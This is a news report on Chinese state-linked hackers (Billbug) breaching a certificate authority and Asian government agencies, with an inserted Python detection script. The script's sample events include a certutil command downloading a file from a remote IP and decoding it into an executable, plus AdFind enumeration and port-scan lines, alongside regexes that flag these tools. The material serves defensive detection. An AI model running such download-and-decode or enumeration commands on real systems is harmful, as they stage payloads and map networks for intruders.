16 November 2022

Chinese hackers breached certificate authority

China-based state-sponsored hackers compromised an unnamed certificate authority as well as government and defense agencies in several Asian countries. In at least one instance a large number of machines on a government agency's network were breached, according to Broadcom's Symantec Threat Hunter Team.

“The targeting of a certificate authority is notable, as if the attackers were able to successfully compromise it to access certificates they could potentially use them to sign malware with a valid certificate, and help it avoid detection on victim machines. It could also potentially use compromised certificates to intercept HTTPS traffic,” Symantec said, adding that they found no evidence that the threat actors were successful in compromising digital certificates.

Known as Billbug, Lotus Blossom, or Thrip, the group has been active since at least 2009 and is known to focus on targets in Asian countries.

“The ability of this actor to compromise multiple victims at once indicates that this threat group remains a skilled and well-resourced operator that is capable of carrying out sustained and wide-ranging campaigns,” Symantec researchers wrote. “Billbug also appears to be undeterred by the possibility of having this activity attributed to it, with it reusing tools that have been linked to the group in the past.”

In the latest campaign, which has been ongoing since March 2022, the attackers gained initial access to victims' networks by exploiting public-facing applications. They also used multiple dual-use tools, including AdFind, Certutil, and PortScanner, alongside the custom Hannotog and Sagerunex backdoors seen in earlier Billbug campaigns.
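The dual-use tools named above are legitimate utilities that most organisations cannot simply block, so detection has to rest on how they are invoked and on several of them appearing together on one host. The following is an added example, not code from the original article or from Symantec: a small Python triage over constructed Sysmon-style process-creation records. The command-line patterns (certutil with -urlcache and a URL, certutil -decode, AdFind object-category queries, a standalone port scanner binary) are assumptions about typical dual-use invocations rather than indicators from the report, and every hostname, path, user and IP address below is made up.

```python
"""Hypothetical dual-use tool triage over constructed process-creation events.

Not Symantec's detection logic. The sample events and the regex patterns are
assumptions chosen to illustrate behavioural (command-line) detection of
legitimate tools that an intruder has repurposed.
"""
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    host: str
    user: str
    parent_image: str
    image: str
    cmdline: str


# Each rule: (name, description, regex applied to "<image> <cmdline>").
# The patterns are assumptions about common dual-use invocations, not IOCs.
RULES = (
    ("certutil_download", "certutil fetching a remote file over HTTP(S)",
     re.compile(r"certutil(\.exe)?\b.*\s-urlcache\b.*\bhttps?://", re.IGNORECASE)),
    ("certutil_decode", "certutil decoding a base64 blob to disk",
     re.compile(r"certutil(\.exe)?\b.*\s-decode\b", re.IGNORECASE)),
    ("adfind_enum", "AdFind querying directory objects",
     re.compile(r"adfind(\.exe)?\b.*\s-f\s+\"?\(?objectcategory", re.IGNORECASE)),
    ("portscan", "standalone port scanner executed",
     re.compile(r"portscan(ner)?(\.exe)?\b", re.IGNORECASE)),
)

# Constructed sample telemetry (hosts, users, paths and IPs are fictional).
SAMPLE_EVENTS = (
    ProcessEvent("GOV-WS-01", "CORP\\jdoe", r"C:\Windows\System32\cmd.exe",
                 r"C:\Windows\System32\certutil.exe",
                 r"certutil.exe -urlcache -split -f http://198.51.100.7/update.dat C:\Windows\Temp\update.dat"),
    ProcessEvent("GOV-WS-01", "CORP\\jdoe", r"C:\Windows\System32\cmd.exe",
                 r"C:\Windows\System32\certutil.exe",
                 r"certutil.exe -decode C:\Windows\Temp\update.dat C:\Windows\Temp\svc.exe"),
    ProcessEvent("GOV-WS-01", "CORP\\jdoe", r"C:\Windows\System32\cmd.exe",
                 r"C:\Tools\adfind.exe",
                 r'adfind.exe -f "(objectcategory=person)" samaccountname memberof'),
    # Benign admin use of certutil: verifies a certificate, no download, no decode.
    ProcessEvent("GOV-WS-02", "CORP\\pkiadmin", r"C:\Windows\System32\cmd.exe",
                 r"C:\Windows\System32\certutil.exe",
                 r"certutil.exe -verify -urlfetch C:\certs\server.cer"),
    # A single scanner on its own is a weaker signal and is not escalated alone.
    ProcessEvent("GOV-WS-03", "CORP\\svc_backup", r"C:\Windows\explorer.exe",
                 r"C:\Users\svc_backup\Downloads\portscanner.exe",
                 r"portscanner.exe 10.20.0.0/24 445,3389"),
)


def match_event(ev: ProcessEvent) -> list[str]:
    """Return the names of every rule that fires on one process-creation event."""
    haystack = f"{ev.image} {ev.cmdline}"
    return [name for name, _desc, rx in RULES if rx.search(haystack)]


def triage(events, min_distinct_rules: int = 2) -> dict[str, list[str]]:
    """Group hits per host and escalate hosts where several distinct tools were seen.

    Requiring more than one distinct rule per host filters out the lone
    administrator running certutil or a scanner for a legitimate reason.
    """
    hits: dict[str, set[str]] = defaultdict(set)
    for ev in events:
        for name in match_event(ev):
            hits[ev.host].add(name)
    return {host: sorted(names) for host, names in hits.items()
            if len(names) >= min_distinct_rules}


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(f"{ev.host:10} {match_event(ev) or '-'}")
    print("escalate:", triage(SAMPLE_EVENTS))
```

In practice the same rules would run over Sysmon Event ID 1 or Windows Security 4688 records with command-line auditing enabled, and the escalation threshold would be tuned per environment; the point of the host-level grouping is that none of these tools is malicious by itself, while download, decode and directory enumeration on one workstation in quick succession is the shape of the activity described in the report.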

“While we do not see data being exfiltrated in this campaign, Billbug is widely regarded as being an espionage actor, indicating that data theft is the most likely motivation in this campaign. The victims in this campaign – government agencies and a certificate authority – also point to an espionage and data-theft motive. The targeting of the government victims is most likely driven by espionage motivations, with the certificate authority likely targeted in order to steal legitimate digital certificates,” Symantec said.

